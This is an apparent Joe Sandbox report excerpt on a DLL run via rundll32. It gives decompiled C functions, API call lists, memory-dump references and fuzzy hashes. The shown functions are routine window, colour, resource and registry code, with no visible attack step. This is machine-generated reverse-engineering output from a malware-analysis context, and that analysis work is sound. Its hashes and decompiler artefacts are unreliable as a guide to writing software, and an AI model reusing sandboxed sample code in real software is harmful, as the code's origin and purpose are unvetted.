                                                                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
                                                                                                        • String ID:
                                                                                                        • API String ID: 2880340415-0
                                                                                                        • Opcode ID: e8eaefde672312bbeea0cbd94d878db2f6262a84424e78bf45e42aff1e8da167
                                                                                                        • Instruction ID: f242cdef1d1f4f3441e18914d79bf947f445baee6b5edcf56fcd1cdadf21bac8
                                                                                                        • Opcode Fuzzy Hash: e8eaefde672312bbeea0cbd94d878db2f6262a84424e78bf45e42aff1e8da167
                                                                                                        • Instruction Fuzzy Hash: EC01E135D00621ABE701CF50888674E73E0FB00693F210129F850EFA92C7796A90CBD9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1001B210, Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E1001B210(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v16;
				int _t12;
				int _t16;
				int _t18;
				intOrPtr _t19;
				void* _t24;
				intOrPtr* _t27;

				_t19 = _a4;
				_t27 = __ecx;
				E1002BA4B(__ecx, _t19, _a8);
				_t12 = E10011632(__ecx);
				if((_t12 & 0x00000100) != 0) {
					_t12 = IsZoomed(GetParent( *(__ecx + 0x20)));
					if(_t12 == 0) {
						 *((intOrPtr*)( *_t27 + 0x110))(0x407, 0,  &_v16, _t24);
						_t16 = GetSystemMetrics(5);
						_t18 = GetSystemMetrics(2);
						 *((intOrPtr*)(_t19 + 8)) =  *((intOrPtr*)(_t19 + 8)) - _t16 + _t16 - _v16 - _t18;
						return _t18;
					}
				}
				return _t12;
			}










                                                                                                        0x1001b217
                                                                                                        0x1001b21e
                                                                                                        0x1001b221
                                                                                                        0x1001b228
                                                                                                        0x1001b231
                                                                                                        0x1001b23d
                                                                                                        0x1001b245
                                                                                                        0x1001b257
                                                                                                        0x1001b265
                                                                                                        0x1001b273
                                                                                                        0x1001b277
                                                                                                        0x00000000
                                                                                                        0x1001b27a
                                                                                                        0x1001b245
                                                                                                        0x1001b27e

                                                                                                        APIs
                                                                                                          • Part of subcall function 10011632: GetWindowLongA.USER32 ref: 1001163D
                                                                                                        • GetParent.USER32(?), ref: 1001B236
                                                                                                        • IsZoomed.USER32(00000000), ref: 1001B23D
                                                                                                        • GetSystemMetrics.USER32 ref: 1001B265
                                                                                                        • GetSystemMetrics.USER32 ref: 1001B273
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MetricsSystem$LongParentWindowZoomed
                                                                                                        • String ID:
                                                                                                        • API String ID: 3909876373-0
                                                                                                        • Opcode ID: 2027483597c28d088b8d65f95d0945282e13d133a43ca733f2aa58fb268725be
                                                                                                        • Instruction ID: aa866a943e619855876455017d6ab89bfd20e9572458f37e961d8a25e54e31d7
                                                                                                        • Opcode Fuzzy Hash: 2027483597c28d088b8d65f95d0945282e13d133a43ca733f2aa58fb268725be
                                                                                                        • Instruction Fuzzy Hash: A8018676A00514ABDB10ABB4CC9AB8DB7B8EF44744F014125FF06EB191DA70AD45CBA4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1000CB1E, Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E1000CB1E(struct HDC__* _a4, intOrPtr _a8, intOrPtr _a12, void* _a16, long _a20) {
				long _v12;
				void _v16;
				intOrPtr _t12;
				long _t16;
				void* _t21;
				void* _t22;
				void* _t23;

				if(_a4 == 0 || _a16 == 0) {
					L10:
					return 0;
				} else {
					_t12 = _a12;
					if(_t12 == 1 || _t12 == 0 || _t12 == 5 || _t12 == 2 && E10029831(_t21, _t22, _t23, _a8, _t12) == 0) {
						goto L10;
					} else {
						GetObjectA(_a16, 0xc,  &_v16);
						SetBkColor(_a4, _v12);
						_t16 = _a20;
						if(_t16 == 0xffffffff) {
							_t16 = GetSysColor(8);
						}
						SetTextColor(_a4, _t16);
						return 1;
					}
				}
			}










                                                                                                        0x1000cb28
                                                                                                        0x1000cb8d
                                                                                                        0x00000000
                                                                                                        0x1000cb30
                                                                                                        0x1000cb30
                                                                                                        0x1000cb36
                                                                                                        0x00000000
                                                                                                        0x1000cb53
                                                                                                        0x1000cb5c
                                                                                                        0x1000cb68
                                                                                                        0x1000cb6e
                                                                                                        0x1000cb74
                                                                                                        0x1000cb78
                                                                                                        0x1000cb78
                                                                                                        0x1000cb82
                                                                                                        0x00000000
                                                                                                        0x1000cb8a
                                                                                                        0x1000cb36

                                                                                                        APIs
                                                                                                        • GetObjectA.GDI32(00000000,0000000C,?), ref: 1000CB5C
                                                                                                        • SetBkColor.GDI32(00000000,00000000), ref: 1000CB68
                                                                                                        • GetSysColor.USER32(00000008), ref: 1000CB78
                                                                                                        • SetTextColor.GDI32(00000000,?), ref: 1000CB82
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Color$ObjectText
                                                                                                        • String ID:
                                                                                                        • API String ID: 829078354-0
                                                                                                        • Opcode ID: 4cd7b4a95473d6a3777c221183f5ddf1fdffb6d416a574fda1b8added31c62fd
                                                                                                        • Instruction ID: 5b32d6ff7603df9b298d5f84671f4360422e4d9130b3f17c92165de6b0d46618
                                                                                                        • Opcode Fuzzy Hash: 4cd7b4a95473d6a3777c221183f5ddf1fdffb6d416a574fda1b8added31c62fd
                                                                                                        • Instruction Fuzzy Hash: A501E83450020EABFB419FB0DC46EAE3BA9EB056E5F504521FD12D51E4DB30CA95DB51
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 100114FD, Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E100114FD(void* __ecx, CHAR* _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HRSRC__* _t8;
				void* _t9;
				void* _t11;
				void* _t14;
				void* _t15;
				void* _t16;
				struct HINSTANCE__* _t17;
				void* _t18;

				_t14 = 0;
				_t11 = 0;
				_t19 = _a4;
				_t18 = __ecx;
				if(_a4 == 0) {
					L4:
					_t16 = E100110B4(_t18, _t11);
					if(_t11 != 0 && _t14 != 0) {
						FreeResource(_t14);
					}
					return _t16;
				}
				_t17 =  *(E1000AB19(0, 0, _t15, _t19) + 0xc);
				_t8 = FindResourceA(_t17, _a4, 0xf0);
				if(_t8 == 0) {
					goto L4;
				}
				_t9 = LoadResource(_t17, _t8);
				_t14 = _t9;
				if(_t14 != 0) {
					_t11 = LockResource(_t14);
					goto L4;
				}
				return _t9;
			}















                                                                                                        0x10011501
                                                                                                        0x10011503
                                                                                                        0x10011505
                                                                                                        0x10011509
                                                                                                        0x1001150b
                                                                                                        0x10011540
                                                                                                        0x1001154a
                                                                                                        0x1001154c
                                                                                                        0x10011553
                                                                                                        0x10011553
                                                                                                        0x00000000
                                                                                                        0x10011559
                                                                                                        0x10011512
                                                                                                        0x1001151f
                                                                                                        0x10011527
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001152b
                                                                                                        0x10011531
                                                                                                        0x10011535
                                                                                                        0x1001153e
                                                                                                        0x00000000
                                                                                                        0x1001153e
                                                                                                        0x1001155f

                                                                                                        APIs
                                                                                                        • FindResourceA.KERNEL32(?,?,000000F0), ref: 1001151F
                                                                                                        • LoadResource.KERNEL32(?,00000000,?,?,00000000,1003465F,?), ref: 1001152B
                                                                                                        • LockResource.KERNEL32(00000000,?,?,00000000,1003465F,?), ref: 10011538
                                                                                                        • FreeResource.KERNEL32(00000000,?,?,?,00000000,1003465F,?), ref: 10011553
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Resource$FindFreeLoadLock
                                                                                                        • String ID:
                                                                                                        • API String ID: 1078018258-0
                                                                                                        • Opcode ID: 03cd09b659b80faff1de25e05681a92764143ce5b8b6174939fe76576e1a5247
                                                                                                        • Instruction ID: 45d5f4f49bc87892eb4ff84dea624ac15e30c00a6e33766e90422a643f16de6d
                                                                                                        • Opcode Fuzzy Hash: 03cd09b659b80faff1de25e05681a92764143ce5b8b6174939fe76576e1a5247
                                                                                                        • Instruction Fuzzy Hash: 39F0963A2016119BE3455B664C94ABB76EEDFC59E17010039FE06D6211EF70CE818661
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 100340E0, Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E100340E0(void* __ecx) {
				struct tagPOINT _v12;
				struct tagPOINT _v20;
				struct HDC__* _t19;

				_t19 =  *(__ecx + 8);
				if(_t19 != 0 &&  *(__ecx + 4) != 0) {
					GetViewportOrgEx(_t19,  &_v12);
					E10033FD4(__ecx,  &_v12);
					_v12.y = _v12.y +  *((intOrPtr*)(__ecx + 0x24));
					_v12.x = _v12.x +  *((intOrPtr*)(__ecx + 0x20));
					SetViewportOrgEx( *(__ecx + 4), _v12, _v12.y, 0);
					GetWindowOrgEx( *(__ecx + 8),  &_v20);
					return SetWindowOrgEx( *(__ecx + 4), _v20, _v20.y, 0);
				}
				return _t19;
			}






                                                                                                        0x100340e9
                                                                                                        0x100340ee
                                                                                                        0x100340fb
                                                                                                        0x10034107
                                                                                                        0x1003410f
                                                                                                        0x10034115
                                                                                                        0x10034123
                                                                                                        0x10034130
                                                                                                        0x00000000
                                                                                                        0x10034141
                                                                                                        0x10034149

                                                                                                        APIs
                                                                                                        • GetViewportOrgEx.GDI32(?,?), ref: 100340FB
                                                                                                          • Part of subcall function 10033FD4: GetViewportExtEx.GDI32(?,?), ref: 10033FE5
                                                                                                          • Part of subcall function 10033FD4: GetWindowExtEx.GDI32(?,?), ref: 10033FF2
                                                                                                        • SetViewportOrgEx.GDI32(00000000,?,00000000,00000000), ref: 10034123
                                                                                                        • GetWindowOrgEx.GDI32(?,?), ref: 10034130
                                                                                                        • SetWindowOrgEx.GDI32(00000000,?,?,00000000), ref: 10034141
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ViewportWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 1589084482-0
                                                                                                        • Opcode ID: 393dc1948b58fbdfbc244cdaf01051b87a4f7b7fc52a5ccd11d3b7db22bd5d44
                                                                                                        • Instruction ID: aba7402065dd9221a6c6b3e80884bfa66aff1a274eca49551bd942defb7da472
                                                                                                        • Opcode Fuzzy Hash: 393dc1948b58fbdfbc244cdaf01051b87a4f7b7fc52a5ccd11d3b7db22bd5d44
                                                                                                        • Instruction Fuzzy Hash: 30012835900A19EFDF51DBA4CD49AAEBBB9FF08701F004459F65AA21A0DB31AA54DB04
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1000A2E2, Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 73%
                                                                                                        			E1000A2E2(intOrPtr __ecx, void* __edx, void* __eflags, CHAR* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t9;
				void* _t14;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t22;
				struct HINSTANCE__* _t23;

				_t18 = __edx;
				_push(__ecx);
				_push(_t22);
				_push(_t19);
				_v8 = __ecx;
				_t14 = 0;
				_t23 =  *(E1000AB19(0, _t19, _t22, __eflags) + 0xc);
				_t20 = LoadResource(_t23, FindResourceA(_t23, _a4, 5));
				_t27 = _t20;
				if(_t20 != 0) {
					_t14 = LockResource(_t20);
				}
				_t9 = E10009F04(_t14, _v8, _t18, _t20, _t23, _t27, _t14, _a8, _t23);
				FreeResource(_t20);
				return _t9;
			}















                                                                                                        0x1000a2e2
                                                                                                        0x1000a2e5
                                                                                                        0x1000a2e7
                                                                                                        0x1000a2e8
                                                                                                        0x1000a2e9
                                                                                                        0x1000a2ec
                                                                                                        0x1000a2f3
                                                                                                        0x1000a30a
                                                                                                        0x1000a30c
                                                                                                        0x1000a30e
                                                                                                        0x1000a317
                                                                                                        0x1000a317
                                                                                                        0x1000a321
                                                                                                        0x1000a329
                                                                                                        0x1000a335

                                                                                                        APIs
                                                                                                        • FindResourceA.KERNEL32(?,?,00000005), ref: 1000A2FC
                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 1000A304
                                                                                                        • LockResource.KERNEL32(00000000), ref: 1000A311
                                                                                                        • FreeResource.KERNEL32(00000000,00000000,?,?), ref: 1000A329
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Resource$FindFreeLoadLock
                                                                                                        • String ID:
                                                                                                        • API String ID: 1078018258-0
                                                                                                        • Opcode ID: 6c28bb865aa75301f55e450648fd08d96b848b4bdd28b867a78cb9bb9c0b0679
                                                                                                        • Instruction ID: 0b1793e2512492727e0167c7af0db8d28abca8eecf98f20b54e3c25749b19aa1
                                                                                                        • Opcode Fuzzy Hash: 6c28bb865aa75301f55e450648fd08d96b848b4bdd28b867a78cb9bb9c0b0679
                                                                                                        • Instruction Fuzzy Hash: 44F08936200124BBD7019BE58C99C9FBBADDF45AA17004016FA05E3221D6749F0187A0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10038627, Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E10038627(void* __ebx, void* __ecx, void* __eflags) {
				signed int _t8;
				int _t9;
				void* _t12;
				void* _t13;
				signed int* _t14;
				void* _t15;

				_t11 = __ecx;
				_t13 = __ecx;
				E100382A4(__ecx, __eflags, 1);
				ReleaseCapture();
				_t12 = E1000E5E5(__ebx, _t11, _t15, GetDesktopWindow());
				LockWindowUpdate(0);
				_t14 = _t13 + 0x84;
				_t8 =  *_t14;
				if(_t8 != 0) {
					_t9 = ReleaseDC( *(_t12 + 0x20),  *(_t8 + 4));
					 *_t14 =  *_t14 & 0x00000000;
					return _t9;
				}
				return _t8;
			}









                                                                                                        0x10038627
                                                                                                        0x1003862b
                                                                                                        0x1003862d
                                                                                                        0x10038632
                                                                                                        0x10038646
                                                                                                        0x10038648
                                                                                                        0x1003864e
                                                                                                        0x10038654
                                                                                                        0x10038658
                                                                                                        0x10038660
                                                                                                        0x10038666
                                                                                                        0x00000000
                                                                                                        0x10038666
                                                                                                        0x1003866b

                                                                                                        APIs
                                                                                                          • Part of subcall function 100382A4: GetStockObject.GDI32(00000000), ref: 100382BA
                                                                                                          • Part of subcall function 100382A4: InflateRect.USER32(?,000000FF,000000FF), ref: 10038353
                                                                                                        • ReleaseCapture.USER32(?,?,1003867A), ref: 10038632
                                                                                                        • GetDesktopWindow.USER32 ref: 10038638
                                                                                                        • LockWindowUpdate.USER32(00000000,00000000,?,?,1003867A), ref: 10038648
                                                                                                        • ReleaseDC.USER32 ref: 10038660
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ReleaseWindow$CaptureDesktopInflateLockObjectRectStockUpdate
                                                                                                        • String ID:
                                                                                                        • API String ID: 1260764132-0
                                                                                                        • Opcode ID: 7a977cbea9fc7062b956c3a973d3cb9a4b2984effc7b4510d3562150bf8c0a79
                                                                                                        • Instruction ID: e8eba8b103eb90bb4d36ffdf5556b119ed21fd8c8fbd72528949c33104be400f
                                                                                                        • Opcode Fuzzy Hash: 7a977cbea9fc7062b956c3a973d3cb9a4b2984effc7b4510d3562150bf8c0a79
                                                                                                        • Instruction Fuzzy Hash: B5E0DF325002229FE7215F30DC0DB063AA4FF40316F150424FD44EA060EB36DA00CB94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10035347, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 96%
                                                                                                        			E10035347(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t25;
				intOrPtr* _t28;
				intOrPtr _t31;
				void* _t50;
				intOrPtr* _t52;
				void* _t55;

				_t50 = __edx;
				_push(0x10);
				E1003EE82(0x1005623c, __ebx, __edi, __esi);
				E10001DB0(_t55 - 0x10, E10007F7E());
				 *((intOrPtr*)(_t55 - 4)) = 0;
				_t25 = E10007F7E();
				_t44 = _t55 - 0x1c;
				E10001DB0(_t55 - 0x1c, _t25);
				 *(_t55 - 0x14) = 0;
				if( *((intOrPtr*)(_t55 + 0x14)) == 0x80000000) {
					RegOpenKeyExA(0x80000000, "CLSID", 0, 0x20019, _t55 - 0x14);
				}
				 *(_t55 - 0x18) =  *(_t55 - 0x14);
				_t52 =  *((intOrPtr*)(_t55 + 8));
				 *((char*)(_t55 - 4)) = 2;
				while(1) {
					_t28 =  *_t52;
					if(_t28 == 0) {
						break;
					}
					_t52 = _t52 + 4;
					__eflags =  *((intOrPtr*)(_t55 + 0x14)) - 0x80000000;
					if( *((intOrPtr*)(_t55 + 0x14)) != 0x80000000) {
						L5:
						E1002FA8E(_t44, _t50, _t55 - 0x10, _t28,  *((intOrPtr*)(_t55 + 0xc)),  *((intOrPtr*)(_t55 + 0x10)));
						__eflags =  *((intOrPtr*)(_t55 + 0x14)) - 0x80000000;
						_t31 =  *((intOrPtr*)(_t55 - 0x10));
						if(__eflags != 0) {
							L7:
							E10035A58(_t50, __eflags, _t31);
						} else {
							__eflags =  *((intOrPtr*)(_t31 - 0xc));
							if(__eflags != 0) {
								goto L7;
							}
						}
					} else {
						__eflags =  *_t28;
						if( *_t28 != 0) {
							goto L5;
						}
					}
				}
				E1001BF1F(_t55 - 0x18);
				E10001280( *((intOrPtr*)(_t55 - 0x1c)) + 0xfffffff0, _t50);
				E10001280( *((intOrPtr*)(_t55 - 0x10)) + 0xfffffff0, _t50);
				return E1003EF21(1);
			}









                                                                                                        0x10035347
                                                                                                        0x10035347
                                                                                                        0x1003534e
                                                                                                        0x1003535c
                                                                                                        0x10035363
                                                                                                        0x10035366
                                                                                                        0x1003536c
                                                                                                        0x1003536f
                                                                                                        0x1003537c
                                                                                                        0x1003537f
                                                                                                        0x10035391
                                                                                                        0x10035391
                                                                                                        0x1003539a
                                                                                                        0x1003539d
                                                                                                        0x100353a0
                                                                                                        0x100353d5
                                                                                                        0x100353d5
                                                                                                        0x100353d9
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100353a6
                                                                                                        0x100353a9
                                                                                                        0x100353ac
                                                                                                        0x100353b2
                                                                                                        0x100353bd
                                                                                                        0x100353c2
                                                                                                        0x100353c5
                                                                                                        0x100353c8
                                                                                                        0x100353cf
                                                                                                        0x100353d0
                                                                                                        0x100353ca
                                                                                                        0x100353ca
                                                                                                        0x100353cd
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100353cd
                                                                                                        0x100353ae
                                                                                                        0x100353ae
                                                                                                        0x100353b0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100353b0
                                                                                                        0x100353ac
                                                                                                        0x100353de
                                                                                                        0x100353e9
                                                                                                        0x100353f4
                                                                                                        0x10035401

                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 1003534E
                                                                                                        • RegOpenKeyExA.ADVAPI32(80000000,CLSID,00000000,00020019,?,00000000,00000000,00000010,1003590D,?,?,0000000A,80000000,?,?,00000000), ref: 10035391
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3Open
                                                                                                        • String ID: CLSID
                                                                                                        • API String ID: 94179280-910414637
                                                                                                        • Opcode ID: 3747742e98e0832e072cf47596f240dd66994904a58316c325aa28d759c74e59
                                                                                                        • Instruction ID: fb46be3d87864f91fab00e6d188ff4d588df7d0bfba1a2f045feac1d4d1e9e84
                                                                                                        • Opcode Fuzzy Hash: 3747742e98e0832e072cf47596f240dd66994904a58316c325aa28d759c74e59
                                                                                                        • Instruction Fuzzy Hash: D7216075D0124ADFDB02DFE4C8819EF77B9EF04392F10052AF512AB291DB75AA44CBA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1002F811, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 82%
                                                                                                        			E1002F811(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t21;
				struct HINSTANCE__* _t25;
				_Unknown_base(*)()* _t26;
				void* _t29;
				signed int* _t48;
				void* _t49;
				void* _t50;

				_t44 = __edx;
				_push(4);
				E1003EE82(0x10055c09, __ebx, __edi, __esi);
				_t48 =  *(_t50 + 0x10);
				 *_t48 =  *_t48 & 0x00000000;
				E1002F784(__ebx, __edx, __edi, _t50 - 0x10,  *((intOrPtr*)(_t50 + 8)));
				 *(_t50 - 4) =  *(_t50 - 4) & 0x00000000;
				_t21 = E10007F7E();
				_t35 = _t50 + 0x10;
				E10001DB0(_t50 + 0x10, _t21);
				 *(_t50 - 4) = 1;
				if(E1002F197( *((intOrPtr*)(_t50 - 0x10)), _t50 + 0x10) != 0) {
					_t46 =  *(_t50 + 0x10);
					_push( *(_t50 + 0x10));
					_t25 = E1000CF67(__ebx, _t35,  *(_t50 + 0x10), _t48, __eflags);
					__eflags = _t25;
					if(_t25 != 0) {
						_t26 = GetProcAddress(_t25, "DllGetClassObject");
						__eflags = _t26;
						if(_t26 == 0) {
							_t49 = 0x800401f9;
						} else {
							_t49 =  *_t26( *((intOrPtr*)(_t50 + 8)),  *((intOrPtr*)(_t50 + 0xc)), _t48);
						}
					} else {
						_t49 = 0x80040154;
					}
					E10001280(_t46 - 0x10, _t44);
					E10001280( *((intOrPtr*)(_t50 - 0x10)) + 0xfffffff0, _t44);
					_t29 = _t49;
				} else {
					E10001280( &(( *(_t50 + 0x10))[0xfffffffffffffffc]), _t44);
					E10001280( *((intOrPtr*)(_t50 - 0x10)) + 0xfffffff0, _t44);
					_t29 = 0x80040154;
				}
				return E1003EF21(_t29);
			}










                                                                                                        0x1002f811
                                                                                                        0x1002f811
                                                                                                        0x1002f818
                                                                                                        0x1002f820
                                                                                                        0x1002f823
                                                                                                        0x1002f82a
                                                                                                        0x1002f82f
                                                                                                        0x1002f833
                                                                                                        0x1002f839
                                                                                                        0x1002f83c
                                                                                                        0x1002f848
                                                                                                        0x1002f853
                                                                                                        0x1002f878
                                                                                                        0x1002f87b
                                                                                                        0x1002f87c
                                                                                                        0x1002f881
                                                                                                        0x1002f884
                                                                                                        0x1002f8a8
                                                                                                        0x1002f8ae
                                                                                                        0x1002f8b0
                                                                                                        0x1002f8bf
                                                                                                        0x1002f8b2
                                                                                                        0x1002f8bb
                                                                                                        0x1002f8bb
                                                                                                        0x1002f886
                                                                                                        0x1002f886
                                                                                                        0x1002f886
                                                                                                        0x1002f88e
                                                                                                        0x1002f899
                                                                                                        0x1002f89e
                                                                                                        0x1002f855
                                                                                                        0x1002f85b
                                                                                                        0x1002f866
                                                                                                        0x1002f86b
                                                                                                        0x1002f86b
                                                                                                        0x1002f875

                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 1002F818
                                                                                                          • Part of subcall function 1002F784: _swprintf.LIBCMT ref: 1002F7EA
                                                                                                          • Part of subcall function 1002F197: RegOpenKeyA.ADVAPI32(80000000,CLSID,?), ref: 1002F1CF
                                                                                                          • Part of subcall function 1002F197: RegOpenKeyA.ADVAPI32(?,?,?), ref: 1002F1E3
                                                                                                          • Part of subcall function 1002F197: RegOpenKeyA.ADVAPI32(?,InProcServer32,?), ref: 1002F1FE
                                                                                                          • Part of subcall function 1002F197: RegQueryValueExA.ADVAPI32(?,100630E0,00000000,?,?,?), ref: 1002F218
